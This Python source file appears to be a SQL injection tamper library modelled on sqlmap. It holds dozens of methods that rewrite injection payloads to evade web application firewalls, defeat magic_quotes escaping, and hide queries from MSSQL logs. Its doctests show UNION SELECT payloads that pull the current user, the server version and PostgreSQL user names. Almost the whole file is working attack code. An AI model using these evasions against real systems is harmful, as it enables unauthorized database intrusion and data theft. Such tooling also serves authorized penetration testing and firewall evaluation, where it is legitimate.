self.modsecurityzeroversioned, self.multiplespaces, self.percentage, self.randomcase, self.space2comment, self.space2hash, \
self.space2morehash, self.space2mysqldash, self.space2plus, self.space2randomblank, self.unionalltounion, self.unmagicquotes, \
self.versionedkeywords, self.versionedmorekeywords]
self._MSSQL = [self.uppercase, self.space2randomblank, self.space2mysqldash, self.space2mssqlhash, self.space2mssqlblank, \
self.space2dash, self.space2comment, self.sp_password, self.plus2fnconcat, self.plus2concat, self.percentage, \
self.lowercase, self.equaltolike, self.commentbeforeparentheses, self.charunicodeencode, self.charencode, \
self.between, self.greatest, self.multiplespaces, self.randomcase, self.space2plus, self.unionalltounion, \
self.unmagicquotes]
self._MySQL = [self.versionedmorekeywords, self.versionedkeywords, self.uppercase, self.space2randomblank, self.space2mysqldash, \
self.space2mysqlblank, self.space2mssqlhash, self.space2morehash, self. space2morecomment, self. space2hash, \
self.space2comment, self.percentage, self.modsecurityzeroversioned, self.modsecurityversioned, self.lowercase, \
self.least, self.informationschemacomment, self.ifnull2ifisnull, self.ifnull2casewhenisnull, self.hex2char, \
self.halfversionedmorekeywords, self.greatest, self.equaltolike, self.concat2concatws, self.commentbeforeparentheses, \
self.commalessmid, self.commalesslimit, self.charunicodeencode, self.charencode, self.bluecoat, self.between, self.multiplespaces, \
self.randomcase, self.space2comment, self.space2plus, self.unionalltounion, self.unmagicquotes]
self._Oracle = [self.uppercase, self.space2randomblank, self.space2comment, self.lowercase, self.least, self.greatest, \
self.commentbeforeparentheses, self.charencode, self.between, self.equaltolike, self.multiplespaces, \
self.randomcase, self.space2plus, self.unionalltounion, self.unmagicquotes]
self._PostgreSQL= [self.uppercase, self.substring2leftright, self.space2randomblank, self.space2comment, self.percentage, \
self.lowercase, self.least, self.greatest, self.commentbeforeparentheses, self.charunicodeencode, \
self.charencode, self.between, self.equaltolike, self.multiplespaces, self.randomcase, self.space2plus]
self._SAP_MaxDB = [self.ifnull2ifisnull, self.ifnull2casewhenisnull, self.randomcase, self.space2comment, self.space2plus, \
self.unionalltounion, self.unmagicquotes]
self._SQLite = [self.space2dash, self.ifnull2ifisnull, self.ifnull2casewhenisnull, self.multiplespaces, self.randomcase, \
self.space2comment, self.space2plus, self.unionalltounion, self.unmagicquotes]
self.keywords = set(self.getFileItems('keywords.txt'))
self.techniques = {
'All':self._All,
'General':self._General,
'MSAccess':self._MSAccess,
'MSSQL':self._MSSQL,
'MySQL':self._MySQL,
'Oracle':self._Oracle,
'PostgreSQL':self._PostgreSQL,
'SAP_MaxDB':self._SAP_MaxDB,
'SQLite':self._SQLite
}
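# Usage sketch (the payload below is made up): pick a technique family and
# run a payload through each tamper callable in turn, e.g.
#
#   tamperer = SQLiTamper()
#   for tamper in tamperer.techniques['MySQL']:
#       print(tamper.__name__, tamper("1 AND 9227=9227"))
#
# Every tamper method takes the payload string and returns its transformed form.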
def randomInt(self, length=4, seed=None):
"""
Returns random integer value with provided number of digits
>>> random.seed(0)
>>> self.randomInt(6)
963638
"""
choice = random.choice
return int("".join(choice(string.digits if _ != 0 else string.digits.replace('0', '')) for _ in xrange(0, length)))
def getFileItems(self, filename, commentPrefix='#', lowercase=False, unique=False):
"""
Returns newline delimited items contained inside file
"""
retVal = list() if not unique else collections.OrderedDict()  # a dict is needed when unique=True (see the return statement below)
if filename:
filename = filename.strip('"\'')
try:
with open(filename, 'r') as f:
for line in f:
if commentPrefix:
if line.find(commentPrefix) != -1:
line = line[:line.find(commentPrefix)]
line = line.strip()
if line:
if lowercase:
line = line.lower()
if unique and line in retVal:
continue
if unique:
retVal[line] = True
else:
retVal.append(line)
except (IOError, OSError, MemoryError) as ex:
errMsg = "something went wrong while trying "
errMsg += "to read the content of file ''" % filename
raise Exception(errMsg)
return retVal if not unique else list(retVal.keys())
def chardoubleencode(self, payload, **kwargs):
"""
Double URL-encodes all characters in a given payload (not processing already encoded) (e.g. SELECT -> %2553%2545%254C%2545%2543%2554)
Notes:
* Useful to bypass some weak web application firewalls that do not double URL-decode the request before processing it through their ruleset
>>> tamper('SELECT FIELD FROM%20TABLE')
'%2553%2545%254C%2545%2543%2554%2520%2546%2549%2545%254C%2544%2520%2546%2552%254F%254D%2520%2554%2541%2542%254C%2545'
"""
retVal = payload
if payload:
retVal = ""
i = 0
while i < len(payload):
if payload[i] == '%' and (i < len(payload) - 2) and payload[i + 1:i + 2] in string.hexdigits and payload[i + 2:i + 3] in string.hexdigits:
retVal += '%%25%s' % payload[i + 1:i + 3]
i += 3
else:
retVal += '%%25%.2X' % ord(payload[i])
i += 1
return retVal
def versionedmorekeywords(self, payload, **kwargs):
"""
Encloses each keyword with (MySQL) versioned comment
Requirement:
* MySQL >= 5.1.13
Tested against:
* MySQL 5.1.56, 5.5.11
Notes:
* Useful to bypass several web application firewalls when the
back-end database management system is MySQL
>>> tamper('1 UNION ALL SELECT NULL, NULL, CONCAT(CHAR(58,122,114,115,58),IFNULL(CAST(CURRENT_USER() AS CHAR),CHAR(32)),CHAR(58,115,114,121,58))#')
'1/*!UNION*//*!ALL*//*!SELECT*//*!NULL*/,/*!NULL*/,/*!CONCAT*/(/*!CHAR*/(58,122,114,115,58),/*!IFNULL*/(CAST(/*!CURRENT_USER*/()/*!AS*//*!CHAR*/),/*!CHAR*/(32)),/*!CHAR*/(58,115,114,121,58))#'
"""
def process(match):
word = match.group('word')
if word.upper() in self.keywords and word.upper() not in IGNORE_SPACE_AFFECTED_KEYWORDS:
return match.group().replace(word, "/*!%s*/" % word)
else:
return match.group()
retVal = payload
if payload:
retVal = re.sub(r"(?<=\W)(?P<word>[A-Za-z_]+)(?=\W|\Z)", process, retVal)
retVal = retVal.replace(" /*!", "/*!").replace("*/ ", "*/")
return retVal
def versionedkeywords(self, payload, **kwargs):
"""
Encloses each non-function keyword with (MySQL) versioned comment
Requirement:
* MySQL
Tested against:
* MySQL 4.0.18, 5.1.56, 5.5.11
Notes:
* Useful to bypass several web application firewalls when the
back-end database management system is MySQL
>>> tamper('1 UNION ALL SELECT NULL, NULL, CONCAT(CHAR(58,104,116,116,58),IFNULL(CAST(CURRENT_USER() AS CHAR),CHAR(32)),CHAR(58,100,114,117,58))#')
'1/*!UNION*//*!ALL*//*!SELECT*//*!NULL*/,/*!NULL*/, CONCAT(CHAR(58,104,116,116,58),IFNULL(CAST(CURRENT_USER()/*!AS*//*!CHAR*/),CHAR(32)),CHAR(58,100,114,117,58))#'
"""
def process(match):
word = match.group('word')
if word.upper() in self.keywords:
return match.group().replace(word, "/*!%s*/" % word)
else:
return match.group()
retVal = payload
if payload:
retVal = re.sub(r"(?<=\W)(?P<word>[A-Za-z_]+)(?=[^\w(]|\Z)", process, retVal)
retVal = retVal.replace(" /*!", "/*!").replace("*/ ", "*/")
return retVal
def uppercase(self, payload, **kwargs):
"""
Replaces each keyword character with upper case value (e.g. select -> SELECT)
Tested against:
* Microsoft SQL Server 2005
* MySQL 4, 5.0 and 5.5
* Oracle 10g
* PostgreSQL 8.3, 8.4, 9.0
Notes:
* Useful to bypass very weak and bespoke web application firewalls
that have poorly written permissive regular expressions
* This tamper script should work against all (?) databases
>>> tamper('insert')
'INSERT'
"""
retVal = payload
if payload:
for match in re.finditer(r"[A-Za-z_]+", retVal):
word = match.group()
if word.upper() in self.keywords:
retVal = retVal.replace(word, word.upper())
return retVal
def unmagicquotes(self, payload, **kwargs):
"""
Replaces quote character (') with a multi-byte combo %BF%27 together with generic comment at the end (to make it work)
Notes:
* Useful for bypassing magic_quotes/addslashes feature
Reference:
* http://shiflett.org/blog/2006/jan/addslashes-versus-mysql-real-escape-string
>>> tamper("1' AND 1=1")
'1%bf%27-- -'
"""
retVal = payload
if payload:
found = False
retVal = ""
for i in xrange(len(payload)):
if payload[i] == '\'' and not found:
retVal += "%bf%27"
found = True
else:
retVal += payload[i]
continue
if found:
_ = re.sub(r"(?i)\s*(AND|OR)[\s(]+([^\s]+)\s*(=|LIKE)\s*\2", "", retVal)
if _ != retVal:
retVal = _
retVal += "-- -"
elif not any(_ in retVal for _ in ('#', '--', '/*')):
retVal += "-- -"
return retVal
def unionalltounion(self, payload, **kwargs):
"""
Replaces instances of UNION ALL SELECT with UNION SELECT counterpart
>>> tamper('-1 UNION ALL SELECT')
'-1 UNION SELECT'
"""
return payload.replace("UNION ALL SELECT", "UNION SELECT") if payload else payload
def symboliclogical(self, payload, **kwargs):
"""
Replaces AND and OR logical operators with their symbolic counterparts (&& and ||)
>>> tamper("1 AND '1'='1")
"1 %26%26 '1'='1"
"""
retVal = payload
if payload:
retVal = re.sub(r"(?i)\bAND\b", "%26%26", re.sub(r"(?i)\bOR\b", "%7C%7C", payload))
return retVal
def substring2leftright(self, payload, **kwargs):
"""
Replaces PostgreSQL SUBSTRING with LEFT and RIGHT
Tested against:
* PostgreSQL 9.6.12
Note:
* Useful to bypass weak web application firewalls that filter SUBSTRING (but not LEFT and RIGHT)
>>> tamper('SUBSTRING((SELECT usename FROM pg_user)::text FROM 1 FOR 1)')
'LEFT((SELECT usename FROM pg_user)::text,1)'
>>> tamper('SUBSTRING((SELECT usename FROM pg_user)::text FROM 3 FOR 1)')
'LEFT(RIGHT((SELECT usename FROM pg_user)::text,-2),1)'
"""
retVal = payload
if payload:
match = re.search(r"SUBSTRING\((.+?)\s+FROM[^)]+(\d+)[^)]+FOR[^)]+1\)", payload)
if match:
pos = int(match.group(2))
if pos == 1:
_ = "LEFT(%s,1)" % (match.group(1))
else:
_ = "LEFT(RIGHT(%s,%d),1)" % (match.group(1), 1 - pos)
retVal = retVal.replace(match.group(0), _)
return retVal
def space2randomblank(self, payload, **kwargs):
"""
Replaces space character (' ') with a random blank character from a valid set of alternate characters
Tested against:
* Microsoft SQL Server 2005
* MySQL 4, 5.0 and 5.5
* Oracle 10g
* PostgreSQL 8.3, 8.4, 9.0
Notes:
* Useful to bypass several web application firewalls
>>> random.seed(0)
>>> tamper('SELECT id FROM users')
'SELECT%0Did%0CFROM%0Ausers'
"""
# ASCII table:
# TAB 09 horizontal TAB
# LF 0A new line
# FF 0C new page
# CR 0D carriage return
blanks = ("%09", "%0A", "%0C", "%0D")
retVal = payload
if payload:
retVal = ""
quote, doublequote, firstspace = False, False, False
for i in xrange(len(payload)):
if not firstspace:
if payload[i].isspace():
firstspace = True
retVal += random.choice(blanks)
continue
elif payload[i] == '\'':
quote = not quote
elif payload[i] == '"':
doublequote = not doublequote
elif payload[i] == ' ' and not doublequote and not quote:
retVal += random.choice(blanks)
continue
retVal += payload[i]
return retVal
def space2plus(self, payload, **kwargs):
"""
Replaces space character (' ') with plus ('+')
Notes:
* Is this of any use? The plus gets url-encoded by the sqlmap engine, invalidating the query afterwards
* This tamper script works against all databases
>>> tamper('SELECT id FROM users')
'SELECT+id+FROM+users'
"""
retVal = payload
if payload:
retVal = ""
quote, doublequote, firstspace = False, False, False
for i in xrange(len(payload)):
if not firstspace:
if payload[i].isspace():
firstspace = True
retVal += "+"
continue
elif payload[i] == '\'':
quote = not quote
elif payload[i] == '"':
doublequote = not doublequote
elif payload[i] == " " and not doublequote and not quote:
retVal += "+"
continue
retVal += payload[i]
return retVal
def space2mysqldash(self, payload, **kwargs):
"""
Replaces space character (' ') with a dash comment ('--') followed by a new line ('\n')
Requirement:
* MySQL
* MSSQL
Notes:
* Useful to bypass several web application firewalls.
>>> tamper('1 AND 9227=9227')
'1--%0AAND--%0A9227=9227'
"""
retVal = ""
if payload:
for i in xrange(len(payload)):
if payload[i].isspace():
retVal += "--%0A"
elif payload[i] == '#' or payload[i:i + 3] == '-- ':
retVal += payload[i:]
break
else:
retVal += payload[i]
return retVal
def space2mysqlblank(self, payload, **kwargs):
"""
Replaces (MySQL) instances of space character (' ') with a random blank character from a valid set of alternate characters
Requirement:
* MySQL
Tested against:
* MySQL 5.1
Notes:
* Useful to bypass several web application firewalls
>>> random.seed(0)
>>> tamper('SELECT id FROM users')
'SELECT%A0id%0CFROM%0Dusers'
"""
# ASCII table:
# TAB 09 horizontal TAB
# LF 0A new line
# FF 0C new page
# CR 0D carriage return
# VT 0B vertical TAB (MySQL and Microsoft SQL Server only)
# A0 non-breaking space
blanks = ('%09', '%0A', '%0C', '%0D', '%0B', '%A0')
retVal = payload
if payload:
retVal = ""
quote, doublequote, firstspace = False, False, False
for i in xrange(len(payload)):
if not firstspace:
if payload[i].isspace():
firstspace = True
retVal += random.choice(blanks)
continue
elif payload[i] == '\'':
quote = not quote
elif payload[i] == '"':
doublequote = not doublequote
elif payload[i] == " " and not doublequote and not quote:
retVal += random.choice(blanks)
continue
retVal += payload[i]
return retVal
def space2mssqlhash(self, payload, **kwargs):
"""
Replaces space character (' ') with a pound character ('#') followed by a new line ('\n')
Requirement:
* MSSQL
* MySQL
Notes:
* Useful to bypass several web application firewalls
>>> tamper('1 AND 9227=9227')
'1%23%0AAND%23%0A9227=9227'
"""
retVal = ""
if payload:
for i in xrange(len(payload)):
if payload[i].isspace():
retVal += "%23%0A"
elif payload[i] == '#' or payload[i:i + 3] == '-- ':
retVal += payload[i:]
break
else:
retVal += payload[i]
return retVal
def space2mssqlblank(self, payload, **kwargs):
"""
Replaces (MsSQL) instances of space character (' ') with a random blank character from a valid set of alternate characters
Requirement:
* Microsoft SQL Server
Tested against:
* Microsoft SQL Server 2000
* Microsoft SQL Server 2005
Notes:
* Useful to bypass several web application firewalls
>>> random.seed(0)
>>> tamper('SELECT id FROM users')
'SELECT%0Did%0DFROM%04users'
"""
# ASCII table:
# SOH 01 start of heading
# STX 02 start of text
# ETX 03 end of text
# EOT 04 end of transmission
# ENQ 05 enquiry
# ACK 06 acknowledge
# BEL 07 bell
# BS 08 backspace
# TAB 09 horizontal tab
# LF 0A new line
# VT 0B vertical TAB
# FF 0C new page
# CR 0D carriage return
# SO 0E shift out
# SI 0F shift in
blanks = ('%01', '%02', '%03', '%04', '%05', '%06', '%07', '%08', '%09', '%0B', '%0C', '%0D', '%0E', '%0F', '%0A')
retVal = payload
if payload:
retVal = ""
quote, doublequote, firstspace, end = False, False, False, False
for i in xrange(len(payload)):
if not firstspace:
if payload[i].isspace():
firstspace = True
retVal += random.choice(blanks)
continue
elif payload[i] == '\'':
quote = not quote
elif payload[i] == '"':
doublequote = not doublequote
elif payload[i] == '#' or payload[i:i + 3] == '-- ':
end = True
elif payload[i] == " " and not doublequote and not quote:
if end:
retVal += random.choice(blanks[:-1])
else:
retVal += random.choice(blanks)
continue
retVal += payload[i]
return retVal
def space2morehash(self, payload, **kwargs):
"""
Replaces (MySQL) instances of space character (' ') with a pound character ('#') followed by a random string and a new line ('\n')
Requirement:
* MySQL >= 5.1.13
Tested against:
* MySQL 5.1.41
Notes:
* Useful to bypass several web application firewalls
* Used during the ModSecurity SQL injection challenge,
http://modsecurity.org/demo/challenge.html
>>> random.seed(0)
>>> tamper('1 AND 9227=9227')
'1%23RcDKhIr%0AAND%23upgPydUzKpMX%0A%23lgbaxYjWJ%0A9227=9227'
"""
def process(match):
word = match.group('word')
randomStr = ''.join(random.choice(string.ascii_uppercase + string.ascii_lowercase) for _ in xrange(random.randint(6, 12)))
if word.upper() in self.keywords and word.upper() not in IGNORE_SPACE_AFFECTED_KEYWORDS:
return match.group().replace(word, "%s%%23%s%%0A" % (word, randomStr))
else:
return match.group()
retVal = ""
if payload:
payload = re.sub(r"(?<=\W)(?P<word>[A-Za-z_]+)(?=\W|\Z)", process, payload)
for i in xrange(len(payload)):
if payload[i].isspace():
randomStr = ''.join(random.choice(string.ascii_uppercase + string.ascii_lowercase) for _ in xrange(random.randint(6, 12)))
retVal += "%%23%s%%0A" % randomStr
elif payload[i] == '#' or payload[i:i + 3] == '-- ':
retVal += payload[i:]
break
else:
retVal += payload[i]
return retVal
def space2morecomment(self, payload, **kwargs):
"""
Replaces (MySQL) instances of space character (' ') with comments '/**_**/'
Tested against:
* MySQL 5.0 and 5.5
Notes:
* Useful to bypass weak and bespoke web application firewalls
>>> tamper('SELECT id FROM users')
'SELECT/**_**/id/**_**/FROM/**_**/users'
"""
retVal = payload
if payload:
retVal = ""
quote, doublequote, firstspace = False, False, False
for i in xrange(len(payload)):
if not firstspace:
if payload[i].isspace():
firstspace = True
retVal += "/**_**/"
continue
elif payload[i] == '\'':
quote = not quote
elif payload[i] == '"':
doublequote = not doublequote
elif payload[i] == " " and not doublequote and not quote:
retVal += "/**_**/"
continue
retVal += payload[i]
return retVal
def space2hash(self, payload, **kwargs):
"""
Replaces (MySQL) instances of space character (' ') with a pound character ('#') followed by a random string and a new line ('\n')
Requirement:
* MySQL
Tested against:
* MySQL 4.0, 5.0
Notes:
* Useful to bypass several web application firewalls
* Used during the ModSecurity SQL injection challenge,
http://modsecurity.org/demo/challenge.html
>>> random.seed(0)
>>> tamper('1 AND 9227=9227')
'1%23upgPydUzKpMX%0AAND%23RcDKhIr%0A9227=9227'
"""
retVal = ""
if payload:
for i in xrange(len(payload)):
if payload[i].isspace():
randomStr = ''.join(random.choice(string.ascii_uppercase + string.ascii_lowercase) for _ in xrange(random.randint(6, 12)))
retVal += "%%23%s%%0A" % randomStr
elif payload[i] == '#' or payload[i:i + 3] == '-- ':
retVal += payload[i:]
break
else:
retVal += payload[i]
return retVal
def space2dash(self, payload, **kwargs):
"""
Replaces space character (' ') with a dash comment ('--') followed by a random string and a new line ('\n')
Requirement:
* MSSQL
* SQLite
Notes:
* Useful to bypass several web application firewalls
* Used during the ZeroNights SQL injection challenge,
https://proton.onsec.ru/contest/
>>> random.seed(0)
>>> tamper('1 AND 9227=9227')
'1--upgPydUzKpMX%0AAND--RcDKhIr%0A9227=9227'
"""
retVal = ""
if payload:
for i in xrange(len(payload)):
if payload[i].isspace():
randomStr = ''.join(random.choice(string.ascii_uppercase + string.ascii_lowercase) for _ in xrange(random.randint(6, 12)))
retVal += "--%s%%0A" % randomStr
elif payload[i] == '#' or payload[i:i + 3] == '-- ':
retVal += payload[i:]
break
else:
retVal += payload[i]
return retVal
def space2comment(self, payload, **kwargs):
"""
Replaces space character (' ') with comments '/**/'
Tested against:
* Microsoft SQL Server 2005
* MySQL 4, 5.0 and 5.5
* Oracle 10g
* PostgreSQL 8.3, 8.4, 9.0
Notes:
* Useful to bypass weak and bespoke web application firewalls
>>> tamper('SELECT id FROM users')
'SELECT/**/id/**/FROM/**/users'
"""
retVal = payload
if payload:
retVal = ""
quote, doublequote, firstspace = False, False, False
for i in xrange(len(payload)):
if not firstspace:
if payload[i].isspace():
firstspace = True
retVal += "/**/"
continue
elif payload[i] == '\'':
quote = not quote
elif payload[i] == '"':
doublequote = not doublequote
elif payload[i] == " " and not doublequote and not quote:
retVal += "/**/"
continue
retVal += payload[i]
return retVal
def sp_password(self, payload, **kwargs):
"""
Appends (MsSQL) function 'sp_password' to the end of the payload for automatic obfuscation from DBMS logs
Requirement:
* MSSQL
Notes:
* Appending sp_password to the end of the query will hide it from T-SQL logs as a security measure
* Reference: http://websec.ca/kb/sql_injection
>>> tamper('1 AND 9227=9227-- ')
'1 AND 9227=9227-- sp_password'
"""
retVal = ""
if payload:
retVal = "%s%ssp_password" % (payload, "-- " if not any(_ if _ in payload else None for _ in ('#', "-- ")) else "")
return retVal
def randomcomments(self, payload, **kwargs):
"""
Add random inline comments inside SQL keywords (e.g. SELECT -> S/**/E/**/LECT)
>>> import random
>>> random.seed(0)
>>> tamper('INSERT')
'I/**/NS/**/ERT'
"""
retVal = payload
if payload:
for match in re.finditer(r"\b[A-Za-z_]+\b", payload):
word = match.group()
if len(word) < 2:
continue
if word.upper() in self.keywords:
_ = word[0]
for i in xrange(1, len(word) - 1):
_ += "%s%s" % ("/**/" if randomRange(0, 1) else "", word[i])
_ += word[-1]
if "/**/" not in _:
index = randomRange(1, len(word) - 1)
_ = word[:index] + "/**/" + word[index:]
retVal = retVal.replace(word, _)
return retVal
def randomcase(self, payload, **kwargs):
"""
Replaces each keyword character with random case value (e.g. SELECT -> SEleCt)
Tested against:
* Microsoft SQL Server 2005
* MySQL 4, 5.0 and 5.5
* Oracle 10g
* PostgreSQL 8.3, 8.4, 9.0
* SQLite 3
Notes:
* Useful to bypass very weak and bespoke web application firewalls
that have poorly written permissive regular expressions
* This tamper script should work against all (?) databases
>>> import random
>>> random.seed(0)
>>> tamper('INSERT')
'InSeRt'
>>> tamper('f()')
'f()'
>>> tamper('function()')
'FuNcTiOn()'
>>> tamper('SELECT id FROM `user`')
'SeLeCt Id FrOm `user`'
"""
retVal = payload
if payload:
for match in re.finditer(r"\b[A-Za-z_]{2,}\b", retVal):
word = match.group()
if (word.upper() in self.keywords and re.search(r"(?i)[`\"'\[]%s[`\"'\]]" % word, retVal) is None) or ("%s(" % word) in payload:
while True:
_ = ""
for i in xrange(len(word)):
_ += word[i].upper() if randomRange(0, 1) else word[i].lower()
if len(_) > 1 and _ not in (_.lower(), _.upper()):
break
retVal = retVal.replace(word, _)
return retVal
def plus2fnconcat(self, payload, **kwargs):
"""
Replaces plus operator ('+') with (MsSQL) ODBC function {fn CONCAT()} counterpart
Tested against:
* Microsoft SQL Server 2008
Requirements:
* Microsoft SQL Server 2008+
Notes:
* Useful in case ('+') character is filtered
* https://msdn.microsoft.com/en-us/library/bb630290.aspx
>>> tamper('SELECT CHAR(113)+CHAR(114)+CHAR(115) FROM DUAL')
'SELECT {fn CONCAT({fn CONCAT(CHAR(113),CHAR(114))},CHAR(115))} FROM DUAL'
>>> tamper('1 UNION ALL SELECT NULL,NULL,CHAR(113)+CHAR(118)+CHAR(112)+CHAR(112)+CHAR(113)+ISNULL(CAST(@@VERSION AS NVARCHAR(4000)),CHAR(32))+CHAR(113)+CHAR(112)+CHAR(107)+CHAR(112)+CHAR(113)-- qtfe')
'1 UNION ALL SELECT NULL,NULL,{fn CONCAT({fn CONCAT({fn CONCAT({fn CONCAT({fn CONCAT({fn CONCAT({fn CONCAT({fn CONCAT({fn CONCAT({fn CONCAT(CHAR(113),CHAR(118))},CHAR(112))},CHAR(112))},CHAR(113))},ISNULL(CAST(@@VERSION AS NVARCHAR(4000)),CHAR(32)))},CHAR(113))},CHAR(112))},CHAR(107))},CHAR(112))},CHAR(113))}-- qtfe'
"""
retVal = payload
if payload:
match = re.search(r"('[^']+'|CHAR\(\d+\))\+.*(?<=\+)('[^']+'|CHAR\(\d+\))", retVal)
if match:
old = match.group(0)
parts = []
last = 0
for index in zeroDepthSearch(old, '+'):
parts.append(old[last:index].strip('+'))
last = index
parts.append(old[last:].strip('+'))
replacement = parts[0]
for i in xrange(1, len(parts)):
replacement = "{fn CONCAT(%s,%s)}" % (replacement, parts[i])
retVal = retVal.replace(old, replacement)
return retVal
def plus2concat(self, payload, **kwargs):
"""
Replaces plus operator ('+') with (MsSQL) function CONCAT() counterpart
Tested against:
* Microsoft SQL Server 2012
Requirements:
* Microsoft SQL Server 2012+
Notes:
* Useful in case ('+') character is filtered
>>> tamper('SELECT CHAR(113)+CHAR(114)+CHAR(115) FROM DUAL')
'SELECT CONCAT(CHAR(113),CHAR(114),CHAR(115)) FROM DUAL'
>>> tamper('1 UNION ALL SELECT NULL,NULL,CHAR(113)+CHAR(118)+CHAR(112)+CHAR(112)+CHAR(113)+ISNULL(CAST(@@VERSION AS NVARCHAR(4000)),CHAR(32))+CHAR(113)+CHAR(112)+CHAR(107)+CHAR(112)+CHAR(113)-- qtfe')
'1 UNION ALL SELECT NULL,NULL,CONCAT(CHAR(113),CHAR(118),CHAR(112),CHAR(112),CHAR(113),ISNULL(CAST(@@VERSION AS NVARCHAR(4000)),CHAR(32)),CHAR(113),CHAR(112),CHAR(107),CHAR(112),CHAR(113))-- qtfe'
"""
retVal = payload
if payload:
match = re.search(r"('[^']+'|CHAR\(\d+\))\+.*(?<=\+)('[^']+'|CHAR\(\d+\))", retVal)
if match:
part = match.group(0)
chars = [char for char in part]
for index in zeroDepthSearch(part, '+'):
chars[index] = ','
replacement = "CONCAT(%s)" % "".join(chars)
retVal = retVal.replace(part, replacement)
return retVal
def percentage(self, payload, **kwargs):
"""
Adds a percentage sign ('%') in front of each character (e.g. SELECT -> %S%E%L%E%C%T)
Requirement:
* ASP
Tested against:
* Microsoft SQL Server 2000, 2005
* MySQL 5.1.56, 5.5.11
* PostgreSQL 9.0
Notes:
* Useful to bypass weak and bespoke web application firewalls
>>> tamper('SELECT FIELD FROM TABLE')
'%S%E%L%E%C%T %F%I%E%L%D %F%R%O%M %T%A%B%L%E'
"""
retVal = ""
if payload:
i = 0
while i < len(payload):
if payload[i] == '%' and (i < len(payload) - 2) and payload[i + 1:i + 2] in string.hexdigits and payload[i + 2:i + 3] in string.hexdigits:
retVal += payload[i:i + 3]
i += 3
elif payload[i] != ' ':
retVal += '%%%s' % payload[i]
i += 1
else:
retVal += payload[i]
i += 1
return retVal
def overlongutf8more(self, payload, **kwargs):
"""
Converts all characters in a given payload to overlong UTF8 (not processing already encoded) (e.g. SELECT -> %C1%93%C1%85%C1%8C%C1%85%C1%83%C1%94)
Reference:
* https://www.acunetix.com/vulnerabilities/unicode-transformation-issues/
* https://www.thecodingforums.com/threads/newbie-question-about-character-encoding-what-does-0xc0-0x8a-have-in-common-with-0xe0-0x80-0x8a.170201/
>>> tamper('SELECT FIELD FROM TABLE WHERE 2>1')
'%C1%93%C1%85%C1%8C%C1%85%C1%83%C1%94%C0%A0%C1%86%C1%89%C1%85%C1%8C%C1%84%C0%A0%C1%86%C1%92%C1%8F%C1%8D%C0%A0%C1%94%C1%81%C1%82%C1%8C%C1%85%C0%A0%C1%97%C1%88%C1%85%C1%92%C1%85%C0%A0%C0%B2%C0%BE%C0%B1'
"""
retVal = payload
if payload:
retVal = ""
i = 0
while i < len(payload):
if payload[i] == '%' and (i < len(payload) - 2) and payload[i + 1:i + 2] in string.hexdigits and payload[i + 2:i + 3] in string.hexdigits:
retVal += payload[i:i + 3]
i += 3
else:
retVal += "%%%.2X%%%.2X" % (0xc0 + (ord(payload[i]) >> 6), 0x80 + (ord(payload[i]) & 0x3f))
i += 1
return retVal
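# Illustration of the transformation above: each character is emitted as the
# overlong 2-byte UTF-8 sequence 110000xx 10xxxxxx. For example 'S' (0x53)
# yields 0xC0 + (0x53 >> 6) = 0xC1 and 0x80 + (0x53 & 0x3F) = 0x93, i.e. the
# "%C1%93" visible in the doctest above.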
def overlongutf8(self, payload, **kwargs):
"""
Converts all (non-alphanum) characters in a given payload to overlong UTF8 (not processing already encoded) (e.g. ' -> %C0%A7)
Reference:
* https://www.acunetix.com/vulnerabilities/unicode-transformation-issues/
* https://www.thecodingforums.com/threads/newbie-question-about-character-encoding-what-does-0xc0-0x8a-have-in-common-with-0xe0-0x80-0x8a.170201/
>>> tamper('SELECT FIELD FROM TABLE WHERE 2>1')
'SELECT%C0%A0FIELD%C0%A0FROM%C0%A0TABLE%C0%A0WHERE%C0%A02%C0%BE1'
"""
retVal = payload
if payload:
retVal = ""
i = 0
while i < len(payload):
if payload[i] == '%' and (i < len(payload) - 2) and payload[i + 1:i + 2] in string.hexdigits and payload[i + 2:i + 3] in string.hexdigits:
retVal += payload[i:i + 3]
i += 3
else:
if payload[i] not in (string.ascii_letters + string.digits):
retVal += "%%%.2X%%%.2X" % (0xc0 + (ord(payload[i]) >> 6), 0x80 + (ord(payload[i]) & 0x3f))
else:
retVal += payload[i]
i += 1
return retVal
def multiplespaces(self, payload, **kwargs):
"""
Adds multiple spaces (' ') around SQL keywords
Notes:
* Useful to bypass very weak and bespoke web application firewalls
that have poorly written permissive regular expressions
Reference: https://www.owasp.org/images/7/74/Advanced_SQL_Injection.ppt
>>> random.seed(0)
>>> tamper('1 UNION SELECT foobar')
'1 UNION SELECT foobar'
"""
retVal = payload
if payload:
words = OrderedSet()
for match in re.finditer(r"\b[A-Za-z_]+\b", payload):
word = match.group()
if word.upper() in self.keywords:
words.add(word)
for word in words:
retVal = re.sub(r"(?<=\W)%s(?=[^A-Za-z_(]|\Z)" % word, "%s%s%s" % (' ' * random.randint(1, 4), word, ' ' * random.randint(1, 4)), retVal)
retVal = re.sub(r"(?<=\W)%s(?=[(])" % word, "%s%s" % (' ' * random.randint(1, 4), word), retVal)
return retVal
def modsecurityzeroversioned(self, payload, **kwargs):
"""
Embraces complete query with (MySQL) zero-versioned comment
Requirement:
* MySQL
Tested against:
* MySQL 5.0
Notes:
* Useful to bypass ModSecurity WAF
>>> tamper('1 AND 2>1--')
'1 /*!00000AND 2>1*/--'
"""
retVal = payload
if payload:
postfix = ''
for comment in ('#', '--', '/*'):
if comment in payload:
postfix = payload[payload.find(comment):]
payload = payload[:payload.find(comment)]
break
if ' ' in payload:
retVal = "%s /*!00000%s*/%s" % (payload[:payload.find(' ')], payload[payload.find(' ') + 1:], postfix)
return retVal
def modsecurityversioned(self, payload, **kwargs):
"""
Embraces complete query with (MySQL) versioned comment
Requirement:
* MySQL
Tested against:
* MySQL 5.0
Notes:
* Useful to bypass ModSecurity WAF
>>> import random
>>> random.seed(0)
>>> tamper('1 AND 2>1--')
'1 /*!30963AND 2>1*/--'
"""
retVal = payload
if payload:
postfix = ''
for comment in ('#', '--', '/*'):
if comment in payload:
postfix = payload[payload.find(comment):]
payload = payload[:payload.find(comment)]
break
if ' ' in payload:
retVal = "%s /*!30%s%s*/%s" % (payload[:payload.find(' ')], self.randomInt(3), payload[payload.find(' ') + 1:], postfix)
return retVal
def lowercase(self, payload, **kwargs):
"""
Replaces each keyword character with lower case value (e.g. SELECT -> select)
Tested against:
* Microsoft SQL Server 2005
* MySQL 4, 5.0 and 5.5
* Oracle 10g
* PostgreSQL 8.3, 8.4, 9.0
Notes:
* Useful to bypass very weak and bespoke web application firewalls
that have poorly written permissive regular expressions
>>> tamper('INSERT')
'insert'
"""
retVal = payload
if payload:
for match in re.finditer(r"\b[A-Za-z_]+\b", retVal):
word = match.group()
